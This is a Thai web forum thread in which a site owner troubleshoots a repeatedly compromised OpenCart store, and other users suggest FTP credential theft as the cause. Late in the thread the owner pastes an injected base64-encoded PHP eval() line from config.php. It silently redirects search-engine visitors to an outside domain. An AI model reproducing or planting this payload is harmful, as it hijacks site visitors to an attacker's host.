takaeshi
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 268
|
|
« เมื่อ: 15 สิงหาคม 2013, 20:22:43 » |
|
พอดีเพิ่งโหลดมาลงครับ ทั้งที่แจกกันฟรี และแบบที่ไม่แถมโปรแกรมอะไรมาเลย พอติดตั้งเสร็จก็เข้าได้ปกติ แต่พอทิ้งไว้ 2-3 วัน กลับมา หน้าเว็บก็เข้าได้ แต่ด้านบนเกือบครึ่งหน้าโค๊ดเด็มเลยครับ เป็นมาหลายครั้งแล้ว ผมก็ลบและก็ติดตั้งใหม่ ลงตัวใหม่ก็เป็นตลอด ไม่ทราบว่าเกิดจากสาเหตุใดครับ ทั้งๆ ที่ ปรับไฟล์ config.php กลับมาเป็น 644 แล้วนะครับ (ไม่รู้จะเกี่ยวป่าว) อยากทราบว่าแก้ตรงไหนครับ ขอบคุณครับ http://tulanon.com/
|
|
« แก้ไขครั้งสุดท้าย: 15 สิงหาคม 2013, 20:28:56 โดย takaeshi »
|
บันทึกการเข้า
|
|
|
|
adidog
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 238
ออฟไลน์
กระทู้: 1,861
|
|
« ตอบ #1 เมื่อ: 15 สิงหาคม 2013, 20:34:45 » |
|
|
|
|
บันทึกการเข้า
|
|
|
|
takaeshi
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 268
|
|
« ตอบ #2 เมื่อ: 15 สิงหาคม 2013, 20:46:29 » |
|
ต้องแจ้งทางโฮสต์อย่างเดียวเลยใช่ป่าวครับ ผมเคยติดตั้งจากอีกเครื่องก็เป็นเหมือนกันครับ (ติดตั้งไว้ ตำแหน่งเดียวกันนี้เลยครับ)
|
|
« แก้ไขครั้งสุดท้าย: 15 สิงหาคม 2013, 20:53:51 โดย takaeshi »
|
บันทึกการเข้า
|
|
|
|
NaiTan
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 378
ออฟไลน์
กระทู้: 5,259
|
|
« ตอบ #3 เมื่อ: 15 สิงหาคม 2013, 20:49:51 » |
|
ต้องแจ้งทางโฮสต์อย่างเดียวเลยใช่ป่าวครับ ผมเคยติดตั้งจากอีกเครื่องก็เป็นเหมือนกันครับ
ผมว่า opencart มีช่องโหว่ครับ
|
|
|
บันทึกการเข้า
|
|
|
|
|
adidog
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 238
ออฟไลน์
กระทู้: 1,861
|
|
« ตอบ #5 เมื่อ: 15 สิงหาคม 2013, 20:56:36 » |
|
ต้องแจ้งทางโฮสต์อย่างเดียวเลยใช่ป่าวครับ ผมเคยติดตั้งจากอีกเครื่องก็เป็นเหมือนกันครับ
ผมว่า opencart มีช่องโหว่ครับ https://www.google.com/search?...e=UTF-8&q=site:tulanon.com ดูแค่แคช google ก็รู้แล้วครับ ปัญหาไม่ได้มาจากสคริปต์ เพิ่มเติม ยิ่งพวกไฟล์ .php ดูด้วยแล้ว chmod ต้อง 644 ในแคชของ gg ยังบอกเลยว่ามี eval() ในไฟล์ภาษา ก็พอจะรู้ได้ว่ามันเจาะมาทางไหน ถ้ามันไม่ได้สิทธิ์เขียนไฟล์ได้
|
|
« แก้ไขครั้งสุดท้าย: 15 สิงหาคม 2013, 21:01:34 โดย adidog »
|
บันทึกการเข้า
|
|
|
|
NaiTan
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 378
ออฟไลน์
กระทู้: 5,259
|
|
« ตอบ #6 เมื่อ: 15 สิงหาคม 2013, 21:02:21 » |
|
ลองเปลี่ยนรหัสผ่าน FTP ครับ เป็นไปได้ที่จะถูกโจมตีผ่าน FTP ล็อคอินเข้าไปแทรกโค้ดแปลกปลอมในไฟล์ต่างๆของระบบดังที่เห็นแสดงเออเล่อ
แนะนำให้ใช้เครื่องที่ปลอดไวรัสในการ FTP ไปที่เซิร์ฟเวอร์ ไม่อย่างนั้นคุณจะโดนขโมยรหัสผ่านไปอีก
|
|
|
บันทึกการเข้า
|
|
|
|
max30012540
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 196
ออฟไลน์
กระทู้: 1,310
|
|
« ตอบ #7 เมื่อ: 15 สิงหาคม 2013, 21:06:01 » |
|
ดูๆแล้วก็ งงๆ ครับ ตัวแปร HTTP_REFERER มันจะ Error ไปได้ไง ลองดูใน phpinfo ดูละกันครับ ว่าปิด eval ไว้หรือเปล่า
|
|
|
บันทึกการเข้า
|
|
|
|
max30012540
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 196
ออฟไลน์
กระทู้: 1,310
|
|
« ตอบ #8 เมื่อ: 15 สิงหาคม 2013, 21:07:41 » |
|
กับอีกวิธี คือหักดิบไปเลย .htaccess php_flag display_startup_errors on php_flag display_errors on php_flag html_errors on php_flag log_errors on
|
|
|
บันทึกการเข้า
|
|
|
|
adidog
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 238
ออฟไลน์
กระทู้: 1,861
|
|
« ตอบ #9 เมื่อ: 15 สิงหาคม 2013, 21:27:44 » |
|
ดูๆแล้วก็ งงๆ ครับ ตัวแปร HTTP_REFERER มันจะ Error ไปได้ไง ลองดูใน phpinfo ดูละกันครับ ว่าปิด eval ไว้หรือเปล่า ผมว่าน่าจะโดนฝังสคริปต์ที่เป็น eval() มากกว่าครับ
|
|
|
บันทึกการเข้า
|
|
|
|
takaeshi
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 268
|
|
« ตอบ #10 เมื่อ: 15 สิงหาคม 2013, 21:47:21 » |
|
ด้วยความรู้ในเรื่องนี้น้อย ผมจะลองปล้ำกะมันในวันเสาร์อาทิตย์ดีกว่า ถ้าไม่ได้ต้องลงใหม่ ดูซิว่าจะหายหรือไม่
ปล. 1.ไฟล์ php.info อยู่ตรงไหนเหรอครับ หาไม่เจอจริงๆ 2. ที่ท่าน max30012540 แนะนำให้ใช้โค๊ดในไฟล์ .htaccess ไม่สำเร็จครับ ขอบพระคุณทุกๆ ท่านครับ
|
|
|
บันทึกการเข้า
|
|
|
|
Freedomlover
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 207
ออฟไลน์
กระทู้: 2,097
|
|
« ตอบ #11 เมื่อ: 15 สิงหาคม 2013, 21:55:55 » |
|
ดูๆแล้วก็ งงๆ ครับ ตัวแปร HTTP_REFERER มันจะ Error ไปได้ไง ลองดูใน phpinfo ดูละกันครับ ว่าปิด eval ไว้หรือเปล่า ผมว่าน่าจะโดนฝังสคริปต์ที่เป็น eval() มากกว่าครับ น่าจะเป็นตามนี้ครับ ตอนที่เปลี่ยนไปใช้เครื่องอื่น ไม่แน่ใจว่าได้เปลี่ยนรหัสผ่าน ftp หรือเปล่า
|
|
|
บันทึกการเข้า
|
โฮสติ้ง คุณภาพสูง ราคาเริ่มต้น 50 บาท/เดือน ทดลองใช้ฟรี 30 วัน SSD VPS แรงๆ จดโดเมนเพียง 400 บาท/ปี ด้วยประสบการณ์กว่า 12 ปี Tel 0840640213
|
|
|
popep
สมุนแก๊งเสียว
พลังน้ำใจ: 100
ออฟไลน์
กระทู้: 946
|
|
« ตอบ #12 เมื่อ: 15 สิงหาคม 2013, 22:02:28 » |
|
ได้โหลดจาก http://www.opencart.com/ หรือเปล่าครับ
|
|
|
บันทึกการเข้า
|
|
|
|
takaeshi
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 268
|
|
« ตอบ #13 เมื่อ: 16 สิงหาคม 2013, 18:10:21 » |
|
ตอนนี้ลงใหม่แล้วครับ เปลี่ยน พาสเวิร์ด FTP ใหม่ ด้วย ลองปล่อยซักระยะ ถ้าไม่มีอะไรเปลี่ยนแปลง ค่อยหาวิธีทำอย่างอื่นครับ
หากมีปัญหา จะรบกวนทุกท่านอีกสักครั้งครับ ขอบคุณครับ
|
|
|
บันทึกการเข้า
|
|
|
|
GoogleBot
Verified Seller
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 346
ออฟไลน์
กระทู้: 6,993
|
|
« ตอบ #14 เมื่อ: 16 สิงหาคม 2013, 18:13:30 » |
|
ลงตามวิธีที่ถูกต้องหรือเปล่าพวก 777 อะครับ
เช็คดี ๆ มีโฟลเดอร์ย่อยด้วย
ถ้าคิดว่าครบทุกอย่างแล้วเป็น แนะนำให้เปลี่ยนพาส ftp ครับ อาจจะโดนสอยตูดแล้ว 555+
|
|
|
บันทึกการเข้า
|
|
|
|
takaeshi
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 268
|
|
« ตอบ #15 เมื่อ: 28 สิงหาคม 2013, 22:38:01 » |
|
หลังจากเปลี่ยนรหัส FTP ใช้มาได้ 4-5 วัน กลับมาเป็นเหมือนเดิมอีกแล้วครับ ใช้วิธีใส่โค๊ดตามท่าน max30012540 ก็ไม่หาย แต่มันจะเป็นเฉพาะหน้าแรกนะครับ เมื่อเราคลิกหน้าต่อไป หรือหน้าอื่น โค๊ดที่ว่าก็จะไม่มีแล้วครับ พอไปดูแถวแรกของไฟล์ config.php เจอแบบนี้ครับ <?php eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91ZW5ka2drdy5kZG5zLm1lLnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ==")); // HTTP
ไม่ทราบว่าเกี่ยวกันหรือไม่ ส่วนไฟล์ php.ini เป็นอย่างนี้ครับ (ไฟล์ php.info หาไม่เจอครับ magic_quotes_gpc = Off; register_globals = Off; default_charset = UTF-8; memory_limit = 64M; max_execution_time = 36000; upload_max_filesize = 999M; safe_mode = Off; mysql.connect_timeout = 20; session.use_cookies = On; session.use_trans_sid = Off; session.gc_maxlifetime = 172800; allow_url_fopen = on; ;display_errors = 1; ;error_reporting = E_ALL;
ไม่ทราบว่ามีอะไรผิดปกติหรือเปล่า พอจะแก้ไขตรงไหนได้บ้างครับ ขอบคุณครับ เพราะตอนนี้จะเริ่มลงข้อมูลให้โรงเรียนแล้วครับ
|
|
« แก้ไขครั้งสุดท้าย: 28 สิงหาคม 2013, 22:43:09 โดย takaeshi »
|
บันทึกการเข้า
|
|
|
|
bangkokbank
Newbie
พลังน้ำใจ: 4
ออฟไลน์
กระทู้: 64
|
|
« ตอบ #16 เมื่อ: 28 สิงหาคม 2013, 22:57:24 » |
|
ผมเคยเจอตัวนี้เมื่อหลายปีที่แล้ว มันจะแทรกในไฟล์ที่ชื่อ index นามสกุลอะไรก็แล้วแต่ไปไล่ดูได้ในไฟล์ชื่อพวกนี้เท่านั้น
ต้นตอของปัญหาคือโปรแกรม FTP ครับไม่ใช่โดนใครแฮกเว็บหรืออะไรแบบเจาะจงโดยแฮกเกอร์เซียนอะไรเลยครับ เปลี่ยน Password FTP ก็ไม่หายเพราะตัวแอพ FTP เองนั่นแหละครับมีช่องโหว่หรือต้นเหตุ ส่วนใหญ่ที่โดนๆกันตัวนี้เพราะใช้ FTP FileZilla วิธีแก้ก็ให้ไล่เคลียร์พวกไฟล์ที่โดนให้หมดก่อน อย่าใช้โปรแกรม FTP เดิมอีก แล้วเวลาจะอัพอะไรใหม่ก็ให้ใช้โปรแกรม FTP ใหม่ที่ปลอดภัยมากกว่าที่แจกฟรีหรือที่เก็บ password ไว้ในรูป txt file แบบ FileZilla ครับ(ไม่รู้ปัจจุบันแก้ไขเรื่องนี้หรือยังนะ)
|
|
|
บันทึกการเข้า
|
|
|
|
|